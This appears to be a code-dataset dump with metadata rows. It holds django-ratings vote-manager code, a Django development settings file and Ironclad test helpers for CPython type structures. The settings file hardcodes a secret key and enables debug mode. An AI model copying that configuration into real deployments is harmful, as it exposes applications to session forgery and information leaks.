params=[content_type.id, user.id, min_score, user.id, user.id]
).distinct()
# objects = model_class._default_manager.filter(pk__in=content_type.votes.extra(
# where=['user_id IN (select to_user_id from %s where from_user_id = %d and exclude = 0)' % (self.model._meta.db_table, user.pk)],
# ).filter(score__gte=min_score).exclude(
# object_id__in=IgnoredObject.objects.filter(content_type=content_type, user=user).values_list('object_id', flat=True),
# ).exclude(
# object_id__in=Vote.objects.filter(content_type=content_type, user=user).values_list('object_id', flat=True)
# ).distinct().values_list('object_id', flat=True))
return objects
def update_recommendations(self):
# TODO: this is mysql only atm
# TODO: this doesnt handle scores that have multiple values (e.g. 10 points, 5 stars)
# due to it calling an agreement as score = score. We need to loop each rating instance
# and express the condition based on the range.
from djangoratings.models import Vote
from django.db import connection, DatabaseError
cursor = connection.cursor()
cursor.execute('BEGIN')
try:
cursor.execute('TRUNCATE TABLE %s' % (self.model._meta.db_table,))
except DatabaseError:
cursor.execute('DELETE FROM %s' % (self.model._meta.db_table,))
cursor.execute("""INSERT INTO %(t1)s
(to_user_id, from_user_id, agrees, disagrees, exclude)
SELECT v1.user_id, v2.user_id,
SUM(if(v2.score = v1.score, 1, 0)) AS agrees,
SUM(if(v2.score != v1.score, 1, 0)) AS disagrees, 0
FROM %(t2)s AS v1
INNER JOIN %(t2)s AS v2
ON v1.user_id != v2.user_id
AND v1.object_id = v2.object_id
AND v1.content_type_id = v2.content_type_id
WHERE v1.user_id is not null
AND v2.user_id is not null
GROUP BY v1.user_id, v2.user_id
HAVING agrees / (disagrees + 0.0001) > 3
ON DUPLICATE KEY UPDATE agrees=values(agrees), disagrees=values(disagrees);""" % dict(
t1=self.model._meta.db_table,
t2=Vote._meta.db_table,
))
cursor.execute('commit')
cursor.close()
| 45.403361
| 145
| 0.594855
|
from django.db.models import Manager
from django.db.models.query import QuerySet
from django.contrib.contenttypes.models import ContentType
import itertools
class VoteQuerySet(QuerySet):
def delete(self, *args, **kwargs):
from fields import RatingField
qs = self.distinct().values_list('content_type', 'object_id').order_by('content_type')
to_update = []
for content_type, objects in itertools.groupby(qs, key=lambda x: x[0]):
model_class = ContentType.objects.get(pk=content_type).model_class()
if model_class:
to_update.extend(list(model_class.objects.filter(pk__in=list(objects)[0])))
retval = super(VoteQuerySet, self).delete(*args, **kwargs)
for obj in to_update:
for field in getattr(obj, '_djangoratings', []):
getattr(obj, field.name)._update(commit=False)
obj.save()
return retval
class VoteManager(Manager):
def get_query_set(self):
return VoteQuerySet(self.model)
def get_for_user_in_bulk(self, objects, user):
objects = list(objects)
if len(objects) > 0:
ctype = ContentType.objects.get_for_model(objects[0])
votes = list(self.filter(content_type__pk=ctype.id,
object_id__in=[obj._get_pk_val() \
for obj in objects],
user__pk=user.id))
vote_dict = dict([(vote.object_id, vote) for vote in votes])
else:
vote_dict = {}
return vote_dict
class SimilarUserManager(Manager):
def get_recommendations(self, user, model_class, min_score=1):
from djangoratings.models import Vote, IgnoredObject
content_type = ContentType.objects.get_for_model(model_class)
params = dict(
v=Vote._meta.db_table,
sm=self.model._meta.db_table,
m=model_class._meta.db_table,
io=IgnoredObject._meta.db_table,
)
objects = model_class._default_manager.extra(
tables=[params['v']],
where=[
'%(v)s.object_id = %(m)s.id and %(v)s.content_type_id = %%s' % params,
'%(v)s.user_id IN (select to_user_id from %(sm)s where from_user_id = %%s and exclude = 0)' % params,
'%(v)s.score >= %%s' % params,
'%(v)s.object_id NOT IN (select object_id from %(v)s where content_type_id = %(v)s.content_type_id and user_id = %%s)' % params,
'%(v)s.object_id NOT IN (select object_id from %(io)s where content_type_id = %(v)s.content_type_id and user_id = %%s)' % params,
],
params=[content_type.id, user.id, min_score, user.id, user.id]
).distinct()
return objects
def update_recommendations(self):
from djangoratings.models import Vote
from django.db import connection, DatabaseError
cursor = connection.cursor()
cursor.execute('BEGIN')
try:
cursor.execute('TRUNCATE TABLE %s' % (self.model._meta.db_table,))
except DatabaseError:
cursor.execute('DELETE FROM %s' % (self.model._meta.db_table,))
cursor.execute("""INSERT INTO %(t1)s
(to_user_id, from_user_id, agrees, disagrees, exclude)
SELECT v1.user_id, v2.user_id,
SUM(if(v2.score = v1.score, 1, 0)) AS agrees,
SUM(if(v2.score != v1.score, 1, 0)) AS disagrees, 0
FROM %(t2)s AS v1
INNER JOIN %(t2)s AS v2
ON v1.user_id != v2.user_id
AND v1.object_id = v2.object_id
AND v1.content_type_id = v2.content_type_id
WHERE v1.user_id is not null
AND v2.user_id is not null
GROUP BY v1.user_id, v2.user_id
HAVING agrees / (disagrees + 0.0001) > 3
ON DUPLICATE KEY UPDATE agrees=values(agrees), disagrees=values(disagrees);""" % dict(
t1=self.model._meta.db_table,
t2=Vote._meta.db_table,
))
cursor.execute('commit')
cursor.close()
| true
| true
|
f705d6c189996ed6849395984a8050289ed6a38d
| 3,224
|
py
|
Python
|
django_tdd/settings.py
|
migueleichler/django-tdd
|
5b8bd6088b5e2de4d70026b761391bce3aa52f32
|
[
"MIT"
] | null | null | null |
django_tdd/settings.py
|
migueleichler/django-tdd
|
5b8bd6088b5e2de4d70026b761391bce3aa52f32
|
[
"MIT"
] | null | null | null |
django_tdd/settings.py
|
migueleichler/django-tdd
|
5b8bd6088b5e2de4d70026b761391bce3aa52f32
|
[
"MIT"
] | null | null | null |
"""
Django settings for django_tdd project.
Generated by 'django-admin startproject' using Django 1.9.12.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'axh7uu^+yfch=#hjgozv%trd3ai55m%xb83=39o4n-y#gk$y6o'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'agenda',
'test_without_migrations',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'django_tdd.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'django_tdd.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
| 26
| 91
| 0.700682
|
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = 'axh7uu^+yfch=#hjgozv%trd3ai55m%xb83=39o4n-y#gk$y6o'
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'agenda',
'test_without_migrations',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'django_tdd.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'django_tdd.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
| true
| true
|
f705d6ce7500355546b594150038c8315daf1d0a
| 9,140
|
py
|
Python
|
tests/utils/cpython.py
|
netcharm/ironclad
|
5892c43b540b216d638e0fed2e6cf3fd8289fdfc
|
[
"PSF-2.0"
] | null | null | null |
tests/utils/cpython.py
|
netcharm/ironclad
|
5892c43b540b216d638e0fed2e6cf3fd8289fdfc
|
[
"PSF-2.0"
] | null | null | null |
tests/utils/cpython.py
|
netcharm/ironclad
|
5892c43b540b216d638e0fed2e6cf3fd8289fdfc
|
[
"PSF-2.0"
] | null | null | null |
from System import IntPtr
from System.Runtime.InteropServices import Marshal
import Ironclad
from Ironclad import CPyMarshal
from Ironclad.Structs import METH, Py_TPFLAGS, PyGetSetDef, PyMemberDef, PyMethodDef, PyTypeObject
from tests.utils.memory import OffsetPtr
def _new_struct(type_, fields, *values):
struct = type_()
for field, value in zip(fields, values):
getattr(type_, field).SetValue(struct, value)
return struct
_meth_fields = 'ml_name ml_meth ml_flags ml_doc'.split()
new_PyMethodDef = lambda *args: _new_struct(PyMethodDef, _meth_fields, *args)
_getset_fields = 'name get set doc closure'.split()
new_PyGetSetDef = lambda *args: _new_struct(PyGetSetDef, _getset_fields, *args)
_member_fields = 'name type offset flags doc'.split()
new_PyMemberDef = lambda *args: _new_struct(PyMemberDef, _member_fields, *args)
gc_fooler = []
def GC_NotYet(dgt):
gc_fooler.append(dgt)
def GC_Soon():
gc_fooler.remove(dgt)
return GC_Soon
DELEGATE_TYPES = {
METH.OLDARGS: Ironclad.dgt_ptr_ptrptr,
METH.O: Ironclad.dgt_ptr_ptrptr,
METH.NOARGS: Ironclad.dgt_ptr_ptrptr,
METH.VARARGS: Ironclad.dgt_ptr_ptrptr,
METH.KEYWORDS: Ironclad.dgt_ptr_ptrptrptr,
METH.VARARGS | METH.KEYWORDS: Ironclad.dgt_ptr_ptrptrptr,
}
for (k, v) in DELEGATE_TYPES.items():
DELEGATE_TYPES[k | METH.COEXIST] = v
def MakeMethodDef(name, implementation, flags, doc="doc"):
dgt = DELEGATE_TYPES[flags](implementation)
return new_PyMethodDef(name, Marshal.GetFunctionPointerForDelegate(dgt), int(flags), doc), GC_NotYet(dgt)
def MakeGetSetDef(name, get, set, doc, closure=IntPtr.Zero):
deallocs = []
_get = IntPtr.Zero
if get:
getdgt = Ironclad.dgt_ptr_ptrptr(get)
_get = Marshal.GetFunctionPointerForDelegate(getdgt)
deallocs.append(GC_NotYet(getdgt))
_set = IntPtr.Zero
if set:
setdgt = Ironclad.dgt_int_ptrptrptr(set)
_set = Marshal.GetFunctionPointerForDelegate(setdgt)
deallocs.append(GC_NotYet(setdgt))
return new_PyGetSetDef(name, _get, _set, doc, closure), lambda: map(apply, deallocs)
def MakeMemberDef(name, type_, offset, flags, doc="doc"):
return new_PyMemberDef(name, int(type_), offset, flags, doc), lambda: None
MAKETYPEPTR_DEFAULTS = {
"tp_name": "Nemo",
"tp_doc": "Odysseus' reply to the blinded Cyclops",
"ob_refcnt": 1,
"tp_basicsize": 8,
"tp_itemsize": 4,
"tp_flags": Py_TPFLAGS.HAVE_CLASS,
"tp_methods": None,
"tp_members": None,
"tp_getset": None,
"tp_init": None,
"tp_iter": None,
"tp_iternext": None,
"tp_base": IntPtr.Zero,
"tp_bases": IntPtr.Zero,
"tp_as_number": IntPtr.Zero,
}
def GetMapperTypePtrDefaults(mapper):
return {
"ob_type": mapper.PyType_Type,
"tp_alloc": mapper.PyType_GenericAlloc,
"tp_new": mapper.PyType_GenericNew,
"tp_dealloc": mapper.IC_PyBaseObject_Dealloc,
"tp_free": mapper.PyObject_Free,
}
PTR_ARGS = ("ob_type", "tp_base", "tp_bases", "tp_as_number", "tp_as_sequence", "tp_as_mapping")
INT_ARGS = ("ob_refcnt", "tp_basicsize", "tp_itemsize", "tp_flags")
STRING_ARGS = ("tp_name", "tp_doc")
TABLE_ARGS = ("tp_methods", "tp_members", "tp_getset")
FUNC_ARGS = {
"tp_alloc": Ironclad.dgt_ptr_ptrint,
"tp_new": Ironclad.dgt_ptr_ptrptrptr,
"tp_init": Ironclad.dgt_int_ptrptrptr,
"tp_dealloc": Ironclad.dgt_void_ptr,
"tp_free": Ironclad.dgt_void_ptr,
"tp_getattr": Ironclad.dgt_ptr_ptrstr,
"tp_iter": Ironclad.dgt_ptr_ptr,
"tp_iternext": Ironclad.dgt_ptr_ptr,
"tp_call": Ironclad.dgt_ptr_ptrptrptr,
"tp_str": Ironclad.dgt_ptr_ptr,
"tp_repr": Ironclad.dgt_ptr_ptr,
"tp_richcompare": Ironclad.dgt_ptr_ptrptrint,
"tp_compare": Ironclad.dgt_int_ptrptr,
"tp_hash": Ironclad.dgt_int_ptr,
}
def WriteTypeField(typePtr, name, value):
if name in PTR_ARGS:
CPyMarshal.WritePtrField(typePtr, PyTypeObject, name, value)
return lambda: None
if name in INT_ARGS:
CPyMarshal.WriteIntField(typePtr, PyTypeObject, name, int(value))
return lambda: None
if name in STRING_ARGS:
ptr = Marshal.StringToHGlobalAnsi(value)
CPyMarshal.WritePtrField(typePtr, PyTypeObject, name, ptr)
return lambda: Marshal.FreeHGlobal(ptr)
if name in TABLE_ARGS:
ptr, dealloc = MakeItemsTablePtr(value)
CPyMarshal.WritePtrField(typePtr, PyTypeObject, name, ptr)
return dealloc
if name in FUNC_ARGS:
if value is not None:
dgt = FUNC_ARGS[name](value)
CPyMarshal.WriteFunctionPtrField(typePtr, PyTypeObject, name, dgt)
return GC_NotYet(dgt)
return lambda: None
raise KeyError("WriteTypeField can't handle %s, %s" % (name, value))
def MakeTypePtr(mapper, params, allocator=None):
fields = dict(MAKETYPEPTR_DEFAULTS)
fields.update(GetMapperTypePtrDefaults(mapper))
fields.update(params)
deallocs = []
typeSize = Marshal.SizeOf(PyTypeObject)
if allocator:
# pretend this was constructed by a C extension, using the mapper's allocator
# hence mapper should do the deallocation itself
typePtr = allocator.Alloc(typeSize)
else:
typePtr = Marshal.AllocHGlobal(typeSize)
deallocs.append(lambda: Marshal.FreeHGlobal(typePtr))
CPyMarshal.Zero(typePtr, typeSize)
for field, value in fields.items():
deallocs.append(WriteTypeField(typePtr, field, value))
def dealloc():
for f in deallocs:
f()
return typePtr, dealloc
def MakeItemsTablePtr(items):
if not items:
return IntPtr.Zero, lambda: None
itemtype = items[0].__class__
typesize = Marshal.SizeOf(itemtype)
size = typesize * (len(items) + 1)
tablePtr = Marshal.AllocHGlobal(size)
CPyMarshal.Zero(tablePtr, size)
for i, item in enumerate(items):
Marshal.StructureToPtr(item, OffsetPtr(tablePtr, typesize * i), False)
def dealloc():
Marshal.DestroyStructure(tablePtr, itemtype)
Marshal.FreeHGlobal(tablePtr)
return tablePtr, dealloc
NUMSEQMAP_METHODS = {
"nb_negative": Ironclad.dgt_ptr_ptr,
"nb_positive": Ironclad.dgt_ptr_ptr,
"nb_absolute": Ironclad.dgt_ptr_ptr,
"nb_invert": Ironclad.dgt_ptr_ptr,
"nb_int": Ironclad.dgt_ptr_ptr,
"nb_long": Ironclad.dgt_ptr_ptr,
"nb_float": Ironclad.dgt_ptr_ptr,
"nb_oct": Ironclad.dgt_ptr_ptr,
"nb_hex": Ironclad.dgt_ptr_ptr,
"nb_index": Ironclad.dgt_ptr_ptr,
"nb_add": Ironclad.dgt_ptr_ptrptr,
"nb_subtract": Ironclad.dgt_ptr_ptrptr,
"nb_multiply": Ironclad.dgt_ptr_ptrptr,
"nb_divide": Ironclad.dgt_ptr_ptrptr,
"nb_floor_divide": Ironclad.dgt_ptr_ptrptr,
"nb_true_divide": Ironclad.dgt_ptr_ptrptr,
"nb_remainder": Ironclad.dgt_ptr_ptrptr,
"nb_divmod": Ironclad.dgt_ptr_ptrptr,
"nb_lshift": Ironclad.dgt_ptr_ptrptr,
"nb_rshift": Ironclad.dgt_ptr_ptrptr,
"nb_and": Ironclad.dgt_ptr_ptrptr,
"nb_xor": Ironclad.dgt_ptr_ptrptr,
"nb_or": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_add": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_subtract": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_multiply": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_divide": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_floor_divide": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_true_divide": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_remainder": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_lshift": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_rshift": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_and": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_xor": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_or": Ironclad.dgt_ptr_ptrptr,
"nb_nonzero": Ironclad.dgt_int_ptr,
"nb_power": Ironclad.dgt_ptr_ptrptrptr,
"nb_inplace_power": Ironclad.dgt_ptr_ptrptrptr,
"sq_item": Ironclad.dgt_ptr_ptrint,
"sq_concat": Ironclad.dgt_ptr_ptrptr,
"sq_repeat": Ironclad.dgt_ptr_ptrint,
"sq_slice": Ironclad.dgt_ptr_ptrintint,
"sq_ass_item": Ironclad.dgt_int_ptrintptr,
"sq_ass_slice": Ironclad.dgt_int_ptrintintptr,
"sq_length": Ironclad.dgt_int_ptr,
"sq_contains": Ironclad.dgt_int_ptrptr,
"mp_length": Ironclad.dgt_int_ptr,
"mp_subscript": Ironclad.dgt_ptr_ptrptr,
"mp_ass_subscript": Ironclad.dgt_int_ptrptrptr,
}
def MakeNumSeqMapMethods(_type, slots):
size = Marshal.SizeOf(_type)
ptr = Marshal.AllocHGlobal(size)
CPyMarshal.Zero(ptr, size)
deallocs = []
for (slot, func) in slots.items():
dgt = NUMSEQMAP_METHODS[slot](func)
CPyMarshal.WriteFunctionPtrField(ptr, _type, slot, dgt)
deallocs.append(GC_NotYet(dgt))
def dealloc():
for f in deallocs:
f()
Marshal.FreeHGlobal(ptr)
return ptr, dealloc
| 35.426357
| 110
| 0.67954
|
from System import IntPtr
from System.Runtime.InteropServices import Marshal
import Ironclad
from Ironclad import CPyMarshal
from Ironclad.Structs import METH, Py_TPFLAGS, PyGetSetDef, PyMemberDef, PyMethodDef, PyTypeObject
from tests.utils.memory import OffsetPtr
def _new_struct(type_, fields, *values):
struct = type_()
for field, value in zip(fields, values):
getattr(type_, field).SetValue(struct, value)
return struct
_meth_fields = 'ml_name ml_meth ml_flags ml_doc'.split()
new_PyMethodDef = lambda *args: _new_struct(PyMethodDef, _meth_fields, *args)
_getset_fields = 'name get set doc closure'.split()
new_PyGetSetDef = lambda *args: _new_struct(PyGetSetDef, _getset_fields, *args)
_member_fields = 'name type offset flags doc'.split()
new_PyMemberDef = lambda *args: _new_struct(PyMemberDef, _member_fields, *args)
gc_fooler = []
def GC_NotYet(dgt):
gc_fooler.append(dgt)
def GC_Soon():
gc_fooler.remove(dgt)
return GC_Soon
DELEGATE_TYPES = {
METH.OLDARGS: Ironclad.dgt_ptr_ptrptr,
METH.O: Ironclad.dgt_ptr_ptrptr,
METH.NOARGS: Ironclad.dgt_ptr_ptrptr,
METH.VARARGS: Ironclad.dgt_ptr_ptrptr,
METH.KEYWORDS: Ironclad.dgt_ptr_ptrptrptr,
METH.VARARGS | METH.KEYWORDS: Ironclad.dgt_ptr_ptrptrptr,
}
for (k, v) in DELEGATE_TYPES.items():
DELEGATE_TYPES[k | METH.COEXIST] = v
def MakeMethodDef(name, implementation, flags, doc="doc"):
dgt = DELEGATE_TYPES[flags](implementation)
return new_PyMethodDef(name, Marshal.GetFunctionPointerForDelegate(dgt), int(flags), doc), GC_NotYet(dgt)
def MakeGetSetDef(name, get, set, doc, closure=IntPtr.Zero):
deallocs = []
_get = IntPtr.Zero
if get:
getdgt = Ironclad.dgt_ptr_ptrptr(get)
_get = Marshal.GetFunctionPointerForDelegate(getdgt)
deallocs.append(GC_NotYet(getdgt))
_set = IntPtr.Zero
if set:
setdgt = Ironclad.dgt_int_ptrptrptr(set)
_set = Marshal.GetFunctionPointerForDelegate(setdgt)
deallocs.append(GC_NotYet(setdgt))
return new_PyGetSetDef(name, _get, _set, doc, closure), lambda: map(apply, deallocs)
def MakeMemberDef(name, type_, offset, flags, doc="doc"):
return new_PyMemberDef(name, int(type_), offset, flags, doc), lambda: None
MAKETYPEPTR_DEFAULTS = {
"tp_name": "Nemo",
"tp_doc": "Odysseus' reply to the blinded Cyclops",
"ob_refcnt": 1,
"tp_basicsize": 8,
"tp_itemsize": 4,
"tp_flags": Py_TPFLAGS.HAVE_CLASS,
"tp_methods": None,
"tp_members": None,
"tp_getset": None,
"tp_init": None,
"tp_iter": None,
"tp_iternext": None,
"tp_base": IntPtr.Zero,
"tp_bases": IntPtr.Zero,
"tp_as_number": IntPtr.Zero,
}
def GetMapperTypePtrDefaults(mapper):
return {
"ob_type": mapper.PyType_Type,
"tp_alloc": mapper.PyType_GenericAlloc,
"tp_new": mapper.PyType_GenericNew,
"tp_dealloc": mapper.IC_PyBaseObject_Dealloc,
"tp_free": mapper.PyObject_Free,
}
PTR_ARGS = ("ob_type", "tp_base", "tp_bases", "tp_as_number", "tp_as_sequence", "tp_as_mapping")
INT_ARGS = ("ob_refcnt", "tp_basicsize", "tp_itemsize", "tp_flags")
STRING_ARGS = ("tp_name", "tp_doc")
TABLE_ARGS = ("tp_methods", "tp_members", "tp_getset")
FUNC_ARGS = {
"tp_alloc": Ironclad.dgt_ptr_ptrint,
"tp_new": Ironclad.dgt_ptr_ptrptrptr,
"tp_init": Ironclad.dgt_int_ptrptrptr,
"tp_dealloc": Ironclad.dgt_void_ptr,
"tp_free": Ironclad.dgt_void_ptr,
"tp_getattr": Ironclad.dgt_ptr_ptrstr,
"tp_iter": Ironclad.dgt_ptr_ptr,
"tp_iternext": Ironclad.dgt_ptr_ptr,
"tp_call": Ironclad.dgt_ptr_ptrptrptr,
"tp_str": Ironclad.dgt_ptr_ptr,
"tp_repr": Ironclad.dgt_ptr_ptr,
"tp_richcompare": Ironclad.dgt_ptr_ptrptrint,
"tp_compare": Ironclad.dgt_int_ptrptr,
"tp_hash": Ironclad.dgt_int_ptr,
}
def WriteTypeField(typePtr, name, value):
if name in PTR_ARGS:
CPyMarshal.WritePtrField(typePtr, PyTypeObject, name, value)
return lambda: None
if name in INT_ARGS:
CPyMarshal.WriteIntField(typePtr, PyTypeObject, name, int(value))
return lambda: None
if name in STRING_ARGS:
ptr = Marshal.StringToHGlobalAnsi(value)
CPyMarshal.WritePtrField(typePtr, PyTypeObject, name, ptr)
return lambda: Marshal.FreeHGlobal(ptr)
if name in TABLE_ARGS:
ptr, dealloc = MakeItemsTablePtr(value)
CPyMarshal.WritePtrField(typePtr, PyTypeObject, name, ptr)
return dealloc
if name in FUNC_ARGS:
if value is not None:
dgt = FUNC_ARGS[name](value)
CPyMarshal.WriteFunctionPtrField(typePtr, PyTypeObject, name, dgt)
return GC_NotYet(dgt)
return lambda: None
raise KeyError("WriteTypeField can't handle %s, %s" % (name, value))
def MakeTypePtr(mapper, params, allocator=None):
fields = dict(MAKETYPEPTR_DEFAULTS)
fields.update(GetMapperTypePtrDefaults(mapper))
fields.update(params)
deallocs = []
typeSize = Marshal.SizeOf(PyTypeObject)
if allocator:
# hence mapper should do the deallocation itself
typePtr = allocator.Alloc(typeSize)
else:
typePtr = Marshal.AllocHGlobal(typeSize)
deallocs.append(lambda: Marshal.FreeHGlobal(typePtr))
CPyMarshal.Zero(typePtr, typeSize)
for field, value in fields.items():
deallocs.append(WriteTypeField(typePtr, field, value))
def dealloc():
for f in deallocs:
f()
return typePtr, dealloc
def MakeItemsTablePtr(items):
if not items:
return IntPtr.Zero, lambda: None
itemtype = items[0].__class__
typesize = Marshal.SizeOf(itemtype)
size = typesize * (len(items) + 1)
tablePtr = Marshal.AllocHGlobal(size)
CPyMarshal.Zero(tablePtr, size)
for i, item in enumerate(items):
Marshal.StructureToPtr(item, OffsetPtr(tablePtr, typesize * i), False)
def dealloc():
Marshal.DestroyStructure(tablePtr, itemtype)
Marshal.FreeHGlobal(tablePtr)
return tablePtr, dealloc
NUMSEQMAP_METHODS = {
"nb_negative": Ironclad.dgt_ptr_ptr,
"nb_positive": Ironclad.dgt_ptr_ptr,
"nb_absolute": Ironclad.dgt_ptr_ptr,
"nb_invert": Ironclad.dgt_ptr_ptr,
"nb_int": Ironclad.dgt_ptr_ptr,
"nb_long": Ironclad.dgt_ptr_ptr,
"nb_float": Ironclad.dgt_ptr_ptr,
"nb_oct": Ironclad.dgt_ptr_ptr,
"nb_hex": Ironclad.dgt_ptr_ptr,
"nb_index": Ironclad.dgt_ptr_ptr,
"nb_add": Ironclad.dgt_ptr_ptrptr,
"nb_subtract": Ironclad.dgt_ptr_ptrptr,
"nb_multiply": Ironclad.dgt_ptr_ptrptr,
"nb_divide": Ironclad.dgt_ptr_ptrptr,
"nb_floor_divide": Ironclad.dgt_ptr_ptrptr,
"nb_true_divide": Ironclad.dgt_ptr_ptrptr,
"nb_remainder": Ironclad.dgt_ptr_ptrptr,
"nb_divmod": Ironclad.dgt_ptr_ptrptr,
"nb_lshift": Ironclad.dgt_ptr_ptrptr,
"nb_rshift": Ironclad.dgt_ptr_ptrptr,
"nb_and": Ironclad.dgt_ptr_ptrptr,
"nb_xor": Ironclad.dgt_ptr_ptrptr,
"nb_or": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_add": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_subtract": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_multiply": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_divide": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_floor_divide": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_true_divide": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_remainder": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_lshift": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_rshift": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_and": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_xor": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_or": Ironclad.dgt_ptr_ptrptr,
"nb_nonzero": Ironclad.dgt_int_ptr,
"nb_power": Ironclad.dgt_ptr_ptrptrptr,
"nb_inplace_power": Ironclad.dgt_ptr_ptrptrptr,
"sq_item": Ironclad.dgt_ptr_ptrint,
"sq_concat": Ironclad.dgt_ptr_ptrptr,
"sq_repeat": Ironclad.dgt_ptr_ptrint,
"sq_slice": Ironclad.dgt_ptr_ptrintint,
"sq_ass_item": Ironclad.dgt_int_ptrintptr,
"sq_ass_slice": Ironclad.dgt_int_ptrintintptr,
"sq_length": Ironclad.dgt_int_ptr,
"sq_contains": Ironclad.dgt_int_ptrptr,
"mp_length": Ironclad.dgt_int_ptr,
"mp_subscript": Ironclad.dgt_ptr_ptrptr,
"mp_ass_subscript": Ironclad.dgt_int_ptrptrptr,
}
def MakeNumSeqMapMethods(_type, slots):
size = Marshal.SizeOf(_type)
ptr = Marshal.AllocHGlobal(size)
CPyMarshal.Zero(ptr, size)
deallocs = []
for (slot, func) in slots.items():
dgt = NUMSEQMAP_METHODS[slot](func)
CPyMarshal.WriteFunctionPtrField(ptr, _type, slot, dgt)
deallocs.append(GC_NotYet(dgt))
def dealloc():
for f in deallocs:
f()
Marshal.FreeHGlobal(ptr)
return ptr, dealloc
| true
| true
|
